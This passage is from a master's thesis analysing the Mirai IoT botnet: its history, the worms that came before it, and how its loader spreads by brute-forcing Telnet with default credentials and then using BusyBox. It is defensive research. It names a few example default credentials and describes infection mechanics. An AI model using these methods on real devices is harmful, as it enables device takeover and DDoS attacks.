tracking mirai: an in-depth analysis of an iot botnet

The Pennsylvania State UniversityThe Graduate SchoolCollege of Engineering

TRACKING MIRAI: AN IN-DEPTH ANALYSIS OF AN IOT BOTNET

A Thesis inComputer Science and Engineering

byMeghan Carole Riegel

© 2017 Meghan Carole Riegel

Submitted in Partial Fulfillmentof the Requirements

for the Degree of

Master of Science

August 2017

ii

The thesis of Meghan Carole Riegel was reviewed and approved* by the following:

Patrick McDaniel

Distinguished Professor of Computer Science and Engineering

Thesis Advisor, Chair of Committee

Vijaykrishnan Narayanan


Undergraduate Honors Advisor

Chita Das


Interim Department Head, Department of Computer Science and Engineering

*Signatures are on file in the Graduate School.

Abstract

Though botnets have been a security problem for a long time, they have recently begun takingadvantage of the security vulnerabilities present in connected devices often referred to as theInternet of Things. Mirai, a botnet malware which emerged in mid-2016, has been responsible forthe largest DDoS attack on record, a 1.2 Tbps attack on Dyn, a DNS provider. In late 2016, thesource code for Mirai was released on a hacker forum. The goal of this thesis is to investigateMirai, which is responsible for the largest botnets ever seen. We discuss its full functionality,focusing on how it spreads by taking advantage of weak authentication on devices. We take alook at the malware’s strengths and weaknesses and how it may be - and probably currently isbeing - modified and improved. We collected real Mirai tra�c in the wild and investigated howexactly it behaves so that we may distinguish between benign and malicious tra�c. We find thatMirai tra�c may be fingerprinted using deep-packet inspection and that it has evolved to attackmore devices in the past several months. We then use these results to construct a picture of whatthe Mirai landscape currently looks like and where it is headed.

iii

Table of Contents

List of Figures vii

List of Tables viii

Acknowledgments x

Chapter 1Introduction 11.1 Security and Risk in the Internet of Things . . . . . . . . . . . . . . . . . . . . . 21.2 The Mirai Botnet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2

Chapter 2Background & Related Works 42.1 History of Worms and Botnets . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5

2.1.1 Early Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52.1.2 Sophistication of Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . 62.1.3 Internet of Things Malware . . . . . . . . . . . . . . . . . . . . . . . . . . 6

2.2 How Botnets Work . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 72.2.1 Spread . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82.2.2 Infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82.2.3 Command and Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 82.2.4 Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9

Chapter 3Mirai Source Code Analysis 103.1 Loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113.2 Mirai Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 13

3.2.1 Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133.2.2 Botnet Killer . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133.2.3 Scanner . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 14

3.2.3.1 Connection Algorithm . . . . . . . . . . . . . . . . . . . . . . . . 143.2.3.2 Authentication Attempts . . . . . . . . . . . . . . . . . . . . . . 15

3.2.4 Attacker . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163.2.5 Constants Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

3.3 Command and Control . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 173.3.1 Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17

iv

3.3.2 Admin Interface and API . . . . . . . . . . . . . . . . . . . . . . . . . . . 183.3.3 Attack . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19

3.4 Mirai’s Pseudorandom Number Generator . . . . . . . . . . . . . . . . . . . . . . 193.4.1 Randomness Analysis . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 20

Chapter 4Experimental Setup 224.1 Experimental Setup . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 22

Chapter 5Results and Discussion 245.1 Mirai-Infected Device Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . . . 245.2 Mirai Tra�c Headers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25

5.2.1 IPv4 Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265.2.2 TCP Header . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27

5.3 Mirai Tra�c Payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275.3.1 Telnet Negotiation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285.3.2 Linemode . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295.3.3 Timing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 295.3.4 Credentials Tried . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 29

5.4 Locations of Infected Devices . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305.5 Tra�c Flows . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 315.6 Distinguishing Mirai from Other Botnet Tra�c . . . . . . . . . . . . . . . . . . . 32

Chapter 6Conclusions & Takeaways 346.1 Where We Are Now . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 346.2 Improvements to Mirai . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 34

6.2.1 Scanning Strategies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356.2.2 Packet Payload . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356.2.3 Default Password List . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356.2.4 New Vulnerabilities . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 356.2.5 Attack Vectors & Monetization . . . . . . . . . . . . . . . . . . . . . . . . 36

6.3 Takeaways . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 36

Appendix AMirai Botnet Source Code Selections 38A.1 Hackerforums Blog Post . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38

A.1.1 Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 38A.1.2 Requirements . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 39A.1.3 Infrastructure Overview . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40A.1.4 Configuring Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40A.1.5 Configuring CNC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 41A.1.6 Setting Up Cross Compilers . . . . . . . . . . . . . . . . . . . . . . . . . . 41A.1.7 Building CNC + Bot . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

A.1.7.1 How to build bot + CNC . . . . . . . . . . . . . . . . . . . . . . 42A.1.8 Building Echo Loader . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 42

A.2 Custom Data Structures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43A.2.1 Connection Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43

v

A.2.2 Scanner Connection Structure . . . . . . . . . . . . . . . . . . . . . . . . . 44A.2.3 Command and Control Client List . . . . . . . . . . . . . . . . . . . . . . 45

A.3 Constants Table . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46A.4 Built-in Encoding and Decoding . . . . . . . . . . . . . . . . . . . . . . . . . . . 47

A.4.1 Encoding Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47A.4.2 Decoding Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49

Appendix BSupplemental Data 51B.1 Hardcoded List of Default Credentials . . . . . . . . . . . . . . . . . . . . . . . . 51B.2 Credentials Seen in Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . 53B.3 Attack Types and Flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57B.4 Dieharder Test Output . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59

Bibliography 65

vi

List of Figures

1.1 Mirai Timeline . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3

2.1 Timeline of Notable Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52.2 A General Botnet Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7

3.1 The Mirai Botnet Structure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 113.2 The Mirai Loading Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 123.3 The Mirai Scanning Algorithm . . . . . . . . . . . . . . . . . . . . . . . . . . . . 153.4 The Mirai Command and Control Structure . . . . . . . . . . . . . . . . . . . . . 183.5 The Mirai Random Number Generator . . . . . . . . . . . . . . . . . . . . . . . . 20

5.1 Conventional IoT Device Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . 245.2 Mirai-Infected IoT Device Behavior . . . . . . . . . . . . . . . . . . . . . . . . . . 255.3 Benign IPv4 Header [Wireshark] . . . . . . . . . . . . . . . . . . . . . . . . . . . 265.4 Mirai IPv4 Header [Wireshark] . . . . . . . . . . . . . . . . . . . . . . . . . . . . 265.5 Benign TCP Header [Wireshark] . . . . . . . . . . . . . . . . . . . . . . . . . . . 275.6 Mirai TCP Header [Wireshark] . . . . . . . . . . . . . . . . . . . . . . . . . . . . 275.7 Telnet Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285.8 Mirai Telnet Session . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 285.9 Attack Source Heat Map . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 305.10 Input-Output Graph Device 1 (April 30 - May 1) . . . . . . . . . . . . . . . . . . 315.11 Input-Output Graph Device 2 (April 30 - May 1) . . . . . . . . . . . . . . . . . . 315.12 Input-Output Graph Device 2 (May 3 - May 4) . . . . . . . . . . . . . . . . . . . 32

vii

List of Tables

5.1 Top 10 Source Countries . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 31

B.1 Default Credentials Used by Mirai . . . . . . . . . . . . . . . . . . . . . . . . . . 53B.2 Credentials Seen in Collections . . . . . . . . . . . . . . . . . . . . . . . . . . . . 57B.3 Attack Flags . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 58B.4 Attack Types . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 59

viii

Listings

3.1 Killer Memory Search . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 133.2 Attack Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163.3 Mirai’s Pseudo-Random Number Generator . . . . . . . . . . . . . . . . . . . . . 195.1 Packet Header Initialization . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 25A.1 Connection Struct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43A.2 Scanner Connection Struct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44A.3 CNC Client List Struct . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 45

ix

Acknowledgments

I want to thank everyone who helped make this thesis possible, because without them, I wouldnot be graduating with a Master’s degree.

First, to my adviser, Dr. Patrick McDaniel, who guided me through my research and providedsignificant levels of support.

Second, to the rest of the faculty and sta� in the Department of Computer Science andEngineering at Penn State for their support and help answering my myriad of questions, especiallyDr. Adam Smith and Dr. Vijay Narayanan, my honors adviser.

Third, to my family - Mom, Dad, Lauren and Carolyn - for always pushing me to work harderand without whom I would never have pursued the Integrated Undergraduate-Graduate programand received my Master’s degree. I think you all loved my extra football season just as much as Idid.

Finally, I need to thank my fellow graduate students and my friends. You were always willingto spend long nights with me in the lab, the library, or, most often, Willard. You were willing toimpart you specific knowledge on subjects I was not clear on, yet needed to understand in orderto complete this thesis. Tech: Thank you for keeping me sane this year when I most needed it!

x

Dedication

To My Parents.

Mom and Dad, thank you for not only convincing me to attend Penn State and to join theSchreyer Honors College, but for always supporting me and pushing me to do better. I would not

be in the place that I am today without you there every step of the way.

I love you!

xi

Chapter 1 |Introduction

Someone has a botnet with capabilities we haven’tseen before. We looked at the tra�c coming from theattacking systems, and they weren’t just from oneregion of the world or from a small subset of networks- they were everywhere.

Martin McKeay - Akamai

The introduction of connected embedded devices - the so-called Internet of Things (IoT) - hasalready begun to change the landscape of the Internet. This paradigm shift has the potentialto provide us with a plethora of new opportunities and new challenges. In 2008, the NationalIntelligence Council cited the Internet of Things as one of "Six Technologies with PotentialImpacts on US Interests out to 2025" [1]. We will be able to, and in many cases already can,collect information from everyday objects that are connected to the Internet. For example, inthe past two years, the popularity of home automation has exploded. As of November 2016, anestimated 5.1 million Amazon Echo units had been sold to date [2], which is expected to increasesubstantially, even with the introduction of the Google Home and the announcement of Apple’scompetitor product. These products are meant to control the multitude of home automationproducts available, an exploding market including Hue lightbulbs, Nest security products andthermostats, Samsung refrigerators, and more. Even our vehicles are joining the Internet ofThings, with an estimated 75% of shipped cars in 2020 having some kind of Internet connectivityand an estimated $42 billion autonomous-car industry in 2025 [3].

The Internet of Things doesn’t stop there. We are using connected sensors and embeddeddevices to monitor agriculture, improve manufacturing, closely track human health, and buildsmart cities. It is and will be pervasive in almost every industry in both the public and privatesector and is expected to be a $470 billion industry by 2020 [4], with an estimated 20.8 billiondevices connected in that year [5].

1

1.1 Security and Risk in the Internet of ThingsWith the massive potential of the Internet of Things comes immense risk, particularly in the areaof security. Here, we define a secure device as one that maintains confidentiality, integrity, andavailability (often referred to as the CIA triad) of the device and the information it holds andtransmits. Modern PCs, conversely are generally very powerful, updated constantly, and are ableto utilize "computationally-secure" cryptographic schemes to maintain confidentiality and integrityof data. Companies that develop their operating systems, like Google, Apple, and Microsoft,build them with security at the forefront. They, along with a wide variety of researchers, havedeveloped good protocols over the past several decades that ensure their systems are secure andwork well. Most of the time, exploits against PCs utilize zero-day vulnerabilities or take advantageof weak security practices employed by users. There are hundreds of researchers that are activelyimproving operating systems and programs to eliminate these vulnerabilities and to improvesecurity usability. Hundreds more are working to educate users on the importance of security andhow to be safer online.

The security landscape of the Internet of Things is completely di�erent, partially becauseconnected devices are fundamentally di�erent than PCs. These devices are often simple, witha small set of specific functionality. For years, there was no need for security, because theyoperated in closed systems that could not feasibly be compromised. Now, they are going onlineand manufacturers are not paying any attention to their security, either because they do notcare or their developers do not understand how to implement good security. Many devices useweak default passwords and broken cryptographic protocols. To make matters worse, as suchdevices are fundamentally simpler - and di�erent - than a PC, many widely agreed upon protocolswill not work or do not make sense in this new context. The popularity of IoT is exploding tooquickly, before security researchers have gotten a chance to catch up. Finally, IoT devices havelong shelf-lives and are updated much less frequently than a PC would be - if ever. Consideringall of this, IoT has become an extremely attractive - and successful - target for adversaries.

1.2 The Mirai BotnetOn September 20th, 2016, the website Krebs on Security was hit with a DDoS attack by whatwould become known as the Mirai (Japanese for "the future") botnet [6]. It was the largest DDoSattack ever recorded at over 600 Gbps in size. It was apparent that the attack was carried out bya botnet, as is typical in DDoS attacks. However, this one was comprised of Internet of Thingsdevices, including routers, IP cameras and digital video recorders (DVRs). Less than 2 weekslater, the source code [7] was released on a hacker forum by its supposed author: codenameAnna-senpai. It was found to attack IoT devices by brute-force guessing from a hard-coded list ofdefault device usernames and passwords over the Telnet protocol. A few weeks after the releaseof the Mirai source code, an even large attack was executed on the DNS service provider Dyn [8].Several high-profile sites went o�ine, including GitHub, Airbnb, Twitter, Netflix, and Reddit.Reaching over 1Tbps, it was the largest attack ever recorded. It was later announced that the

attack was caused in part by the Mirai botnet, encompassing millions of bots. Now, Mirai hasbeen found to be so prevalent that even if one resets a device, wiping the malware from memory,the device is expected to be re-infected again within minutes, unless the password is changed.

In October 2016, white-hat hackers began with some vigilante justice to combat Mirai. Hajimeis a botnet that attacks the same vulnerabilities as Mirai. Instead of using the devices to attack,it shuts down some of the ports so that Mirai cannot compromise the device [9]. Unfortunately,vigilante justice is rarely the answer. We cannot trust that this botmaster will never use thesebots for malicious purposes, nor that he won’t lose control of the botnet.

Figure 1.1. Mirai Timeline

Mirai has forced us to consider the security of the Internet of Things more seriously. Theprevalence of connected homes is accelerating yet we have no real solution to the security problem.Scarier still is the notion that it won’t be long before attacks leave the digital world and enter thephysical world. Insecure systems make it possible for attacks on our electric grid, on manufacturingsystems or on food production systems to threaten our livelihoods.

In this thesis, we attempt to begin this conversation through the light of the Mirai problem.We investigate the malware’s source code, focusing on how it spreads to new hosts. We collectmalicious tra�c from the wild in order to learn exactly how it behaves and perhaps what variantshave evolved. Then, we attempt to distinguish between malicious and benign tra�c on the telnetport and provide suggestions for improving device security. Finally, we anticipate what Mirai willdo next by looking at our results and at malware evolution in history.

Chapter 2 |Background & Related Works

This was not a mistake. He wanted his worm to runon computers all over the United States.

Ellen R. Meltzer - Federal Prosecuter - US vs. Morris

While this thesis explores the Mirai botnet in depth, it is useful to briefly investigate anddiscuss the malware that preceded it. Then, it may be possible to gain a better understanding ofwhere we are now. From the beginning, computers have attracted the innovative, the curious, andthe malicious. Computers and the Internet have always been a source of discovery, of intelligence,and of profit. Malware has been a part of the story from the beginning. Like the many varietiesof malware, worms are so-named to reflect they way they act in the natural world. Parasiticworms, known collectively as helminths [10], are standalone organisms that live in a host andsteal the food they consume for nourishment. They are able to spread themselves and infectother hosts. Similarly, a worm in the computing world is a standalone piece of software that isable to spread to new vulnerable hosts using a variety of methods. Oftentimes, especially in thecontext of their use in botnets, they cripple their hosts and/or steal computing resources fromtheir hosts to execute attacks, like DDoS attacks. Botnets are networks of zombie computers thatare controlled by a so-called "botmaster" to execute attacks or carry out illicit activities, such asexecuting DDoS attacks, sending spam emails, or collecting confidential information. They areoftentimes a product of worms, though it is not unheard of for botnets to be created using virusesor Trojans. A virus, like a worm, is so-named for its biological counterpart. Viruses are small,cell-level parasites that attack by changing the DNA in a cell, changes which are carried overwhen the cell replicates. A computer virus, in the same vein, will infect a computer by insertingitself into another program. When the program is executed, the virus is as well. A Trojan isnamed for the wooden horse that was used in the Greek assault on Troy. It is malware that isdesigned to look legitimate - a software update, for example. Trojans tend to rely more on socialengineering to spread, unlike worms or viruses [11].

4

2.1 History of Worms and Botnets

Figure 2.1. Timeline of Notable Malware

2.1.1 Early MalwareThe decades-long battle against malware really started in 1988, with the Morris worm. This wormwas the first major worm to infiltrate the Internet and was the first to execute a denial-of-serviceattack. Oddly, this worm originated more from curiosity for a proof-of-concept Internet-wideworm than from malice. Robert Morris was a graduate student at Cornell and, according tohim, wrote the worm to estimate the size of the Internet. Then, the Internet was comprised ofroughly 60,000 machines and the Morris worm infected an estimated 10% of them. It spread ina tree structure: exploiting a machine and then trying its neighbors. In particular, it utilizedpassword-guessing attacks, which would remain a popular exploit in worms into modern day. TheMorris worm spread so well, almost too well, that it would crash machines, as it would infect asingle computer so many times that the computer wouldn’t have the resources to do anything else.It took technicians several days to remove the worm o� of networks and it showed the researchcommunity that malware is in fact a concern, and that security should be a priority [12].

In early 2000, the infamous ILOVEYOU worm was the first major adversarial worm to severlycripple the Internet. Written by a student in the Philippines, the malware was sent via emailin the attachment "LOVE-LETTER-FOR-YOU.TXT.vbs", which, when opened, immediatelyexecuted, overwriting files and sending itself to other users [13]. It didn’t take long for emailclients to block directly-executable attachments like VBScript; programmers and users learnedto be wary on the Internet. However, malware writers also learned, continuing a cat-and-mousegame that would continue to today and will continue into the future.

A year later, the Code Red worm appeared in the wild. It compromised a vulnerabilityon Microsoft’s Internet Information Services web servers that had been announced a monthprior. Once on a host, it would spread by generating 100 threads and trying to attack the samevulnerability on IP addresses via port 80. The worm was very successful. Later analysis showedthat the rate of spread first grew exponentially and then slowed as the set of vulnerable hosts on

the Internet was saturated [14]. Such spread models are very typical worms, at it would be forany illness in the physical world [15], and it is only the acceleration of spread that improves, aswill be shown later. In the early stages of the spread of CodeRed, each server was able to infect1.8 victim servers per hour. Oddly, CodeRed turned itself o� after nearly a day and re-awoke afew weeks later, a trend that would also be repeated in other malware.

Not long after the emergence of Code Red, two new worms appeared: Code Red II (though itscode base was unrelated to Code Red) and Nimda. Code Red II had a localized spread, meaningit was more likely to try IP addresses nearby rather than random addresses across the Internet.

2.1.2 Sophistication of MalwareIn 2003, the Internet saw, for the first time, a worm that spread too quickly for humans toe�ectively intervene. The Slammer worm spread so quickly that it infected 90% of vulnerablehosts within 10 minutes. It exploited a bu�er overflow vulnerability in devices running Microsoft’sSQL server [16]. Just as in the Code Red incident, this vulnerability was patched prior to theincident, though many vulnerable hosts still resided on the network. At its peak, the worm wasachieving a scan rate of over 55 million hosts per second and saturated many networks’ bandwidth,causing widespread outages.

First detected in early 2007, the Storm worm and botnet emerged, named for the subject lineof the spam emails it would send, a method that was similar to the early ILOVEYOU worm.However, Storm was notable because it was one of the first (and one of the most successful) wormsto utilized decentralized control servers, which makes it harder to shut down. [17] Prior to thisdevelopment, botnets like Slammer would connect to an Internet Relay Chat (IRC) channel setup by the attacker to receive commands and updates.

Slammer and Storm, along with many other worms at the time, were malicious, but had themain goal of disrupting the Internet and communiciation via DDoS attacks. March 2008 broughtTorpig, an insidious Trojan horse that sought to steal sensitive information, like passwords andcredit card numbers, for financial gain. It was not the first piece of malware to do so, but thefinancial damage it caused was unparalleled at the time [18].

2.1.3 Internet of Things MalwareIn June 2010, a new type of worm was detected that targeted physical systems. Stuxnet targetedIran’s nuclear program and was responsible for destroying 20% of the country’s nuclear centrifuges.It entered the system via a thumb drive was able to destroy the centrifuges while making themonitoring system show normal functionality. [19] While Stuxnet targeted a very specific type ofdevice, it could be tailored to attack essentially any modern SCADA device.

In 2013, the first so-called Internet of Things botnet malware appeared. Linux-Darllozcompromised a PHP http POST vulnerability that was present on many IoT devices [20]. In2015, BASHLITE (also called qbot) gained access to devices via insecure default credentials andcompromised a vulnerability in the bash shell to exploit devices running BusyBox [21]. Not longafter, the source code was released and by 2016, around one million devices were infected, over

96% of which were IoT devices.In 2016, Mirai appeared. It attacks the same devices as BASHLITE using very similar tactics.

It may in fact be a variant on BASHLITE, but due to its ability to erase other malware fromthe devices it tries to infect, it has been responsible for the largest botnets ever amassed and thelargest DDoS attacks ever recorded.

2.2 How Botnets Work

Figure 2.2. A General Botnet Structure

Botnets are large networks of computers controlled by an adversary that are used for nefariouspurposes, including distributed denial-of-service attacks, spam, theft, and espionage. The vastmajority of botnets are created using worms that spread across networks, connecting computersto a central command-and-control. While many early worms - and in fact some modern malware -tend to cause noticeable damage on computers almost immediately, modern botnets are moreinconspicuous. Botmasters - a malicious user who controls the botnet - want to amass networksof hundreds of thousands of nodes in order to attack a target whenever they please. If a userdoes not know that their machine is part of a botnet, the botmaster can continue to fly under theradar and continue to appear disconnected from their crimes.

Though botnets have evolved in the past few decades, and though modern botnets exist in avariety of families, the core functionality of a botnet is consistent.

2.2.1 SpreadThe primary goal of any botnet is to spread to as many hosts as possible so that attacks are moree�ective. Spreading quickly without detection is a core problem that a botnet designer faces. Afew worms will spread using social engineering methods, like convincing a user to open a maliciousemail attachment or navigate to a malicious website, while others are found on file sharing (P2P)websites [22]. While such methods are e�ective, the proliferation rate is limited by the humansspreading them. More e�ective spreading can be achieved without human interaction, by scanningfor vulnerable IPs and attacking them. Early worms targeted devices randomly. They used arandom number generator to generate lists of IP addresses and attempted to exploit them. [14]found that Code Red spread exponentially but slowed the more saturated the malware became.

Code Red II exploited the same vulnerability as Code Red I but had a more fine-tuned IPaddress selection process, targeting nearby devices more often instead of spreading randomlyacross the internet.

2.2.2 InfectionTypically, an attacker is targeting a particular vulnerability in a device. This could be anything,and is often a zero-day vulnerability, as computers and servers, the traditional target for botnets,typically implement relatively adequate security. In the case of BASHLITE and Mirai, the insecuresecurity implementation - the use of default credentials - is exploited. Once inside the targetdevice, the attacker will download the binary to it.

2.2.3 Command and ControlBotnets are useless unless a botmaster is able to control it and execute commands. Traditionally,bots connect to a central command and control server. This is the case with Mirai. In theearly years of botnets, the addresses of these servers were changed very rarely in order to makeit easier for bots to connect and less likely they will be orphaned. However, the longer theaddress is static, the easier it will be for law enforcement to find the C&C server and take itdown. Modern botmasters typically change the server too often to be accurately tracked - or forit to be worth taking down - requiring bots to be more active in connecting and updating thelocation of the C&C. The vast majority of botnets in the past have used the Internet Relay Chat(IRC) to communicate with a central command-and-control server, which is an application layercommunication protocol [23].

It is useful to discuss another command and control strategy often used. Peer-to-Peer botnetsutilize a more decentralized command and control. Instead of one C&C server, P2P botnetscontain a large number of workers that distribute the control. New bots joining the botnet simplyconnect to these bots. This setup allows the botnets to be much more robust against infiltrationas losing a worker on the botnet does not dismantle the whole system. Furthermore, it makes iteasier for the botnets to evade detection.

2.2.4 AttackBotnets have been used for a wide variety of nefarious purposes. One of the most common uses,as is in the case of Mirai, is to execute DDoS attacks.

Recently, the security community has seen a upward trend in DDoS-for-hire services. It usedto be that an adversary who wants to execute a DDoS attack would have to build their ownbotnet to do so. Now, for around $40, you can get one hour of DDoS attacks; there are eventons of subscription plans available! These services are widely available via a regular Googlesearch and can be purchased with a PayPal account. Incapsula reports that a lot of them marketthemselves as stress test services to avoid suspicion from law enforcement [24]. While big DDoSattacks like the one seen on Dyn have increasingly occurred, so have smaller DDoS attacks. Areport by A10 Networks says that more than 3700 DDoS attacks occur every day, 93% of whichare reliant on DDoS-for-hire services [25]. In fact, in December 2016, 34 individuals were arrested,and a further 101 individuals were warned, in a crackdown on DDoS-for-hire [26].

DDoS attacks are not the only use for botnets. Spam and phishing emails are largely sentwith the help of large botnets and are responsible for 95% of all emails [27]. Some botnets arealso used for widespread personal information collection and identity theft. Botnets can installkeyloggers to collect secret user information, like passwords and credit card information. Theycan sni� tra�c and learn a lot about users.

Chapter 3 |Mirai Source Code Analysis

Today, I have an amazing release for you.

Anna-senpai - Mirai Author

Mirai creates large, resilient, and highly capable IoT botnets that can carry out some of thelargest DDoS attacks ever seen.

In early October 2016, the Mirai source code was released by its apparent author, Anna-senpei [7] [28]. In a blog post, he mentions the release is due to increased scrutiny by lawenforcement (in his words: "there’s lots of eyes looking at IOT now, so it’s time to GTFO.").Releasing the source code of malicious programs is not uncommon for authors becoming nervousabout getting caught. It helps shift the attention away from them; if they are not the only userwith the code, it makes them appear less guilty to law enforcement [29]. The supposed identityof Anna-senpei was later revealed by Krebs to likely be a student named Paras Jha at RutgersUniversity, though the investigation is still ongoing [29].

The Mirai source code is primary written in C while the command and control is written inGo. In total, the repository investigated contains over 12,000 lines of code in 144 files.

Analyses of Mirai have been numerous both before the release of the source code and since [30].While analyses vary, it is estimated that Mirai builds on previous botnet malware and evenprevious IoT botnet malware such as BASHLITE [29]. BASHLITE, which appeared in 2014,utilizes the same vulnerabilities as Mirai - default credentials.

Mirai’s functionality is very straightforward. See Figure 3.1 for an overview of the structure ofa Mirai botnet. It spreads by attempting to connect to randomly selected devices via the Telnetport and then guessing the username and password from a hardcoded list of default credentials(see Table B.1 in Appendix B.1). Most of the credentials found in this list are either exceedinglycommon (e.g. root:password) or are specific to a manufactuer or device (e.g. root:realtek isa username:password combination for Realtek routers) All of these combinations are likely totarget a variety of cameras, routers, DVRs, printers, and more [31].

If Mirai logs in successfully, it downloads the Mirai binary, connects to command and control,and begins spreading to additional hosts. The spreading technique is not new. Botnets have beenemploying vastly similar techniques since the first ones appeared over ten years ago. Even the

10

attack method of guessing passwords has been around since as late as the Conficker worm in 2008.In addition, it was not even the first piece of malware to attack notoriously insecure IoT devices.What makes Mirai unique is that it was able to corner the market on IoT botnets. It has theability to not only infect an IoT device, but to delete pre-existing malware on that device. Assuch, it is able to make its botnet stronger while weakening other currently active botnets. Thisis readily apparent, as Mirai is responsible for some of the largest DDoS attacks ever recorded.

Please note that instances of Mirai in the wild are likely to di�er from the source code, asmany hackers likely took this code and made improvements or changes. The general functionalityof this botnet is likely to be prevalent in the wild, as it is a simple and e�ective way to take controlof the multitude of vulnerable IoT devices online. Trends show that the number of these devicesis likely to increase, as manufacturers are paying little attention to security and governments arenot mandating it.

Figure 3.1. The Mirai Botnet Structure

3.1 LoaderA device found to be vulnerable to Mirai will be attacked and recruited to join the botnet. Theloader is a server separate from the Mirai instances on the individual bots, as sending the binaryis very resource intensive. As discussed in section 3.2.3, the bots send authentication information

for vulnerable devices to the loader, which carries out the attack. They connect to the loaderin the same way they connect to the command and control server (see below). Bots resolve adomain stored in a hardcoded, obfuscated table. Botmasters can easily move the server often toavoid detection. See Figure 3.2 below for a graphical representation of the Mirai Loader.

Figure 3.2. The Mirai Loading Algorithm

When the loader server is initialized, it creates a designated number of so-called workers(threads), 58 by default. Each of these threads will handle attacking a di�erent victim device,which is called an event in the code.

The loader listens for the device information from the bots, which is sent in the format ip:portusername:password) on stdin. When information is received, it is parsed and an attack is addedto the attack queue. A thread picks it up and creates a connection structure for the connectioninstance. It attempts to connect to the device via the Telnet port with the specified credentials,keeping track of the state of the Telnet negotiation process. Once logged into the device, theworker now needs to learn the device’s architecture and how it can most e�ciently exploit it.

Unfortunately for victims, Mirai, once authenticated via Telnet, is able to issue bash commandsto the device using BusyBox. BusyBox is an embedded system utility that is often referred toas the "Swiss army knife of embedded systems". It combines several common Unix commands -like ls, rm, and echo to name a few (see [32] for the full list) - into one small binary. BusyBox isvery modular and a user can pick and choose what features to install onto the device, while stillkeeping the binary tiny. This makes it very attractive for designers of devices like routers; onecan interact with the device using familiar commands while keeping the power low and size small.

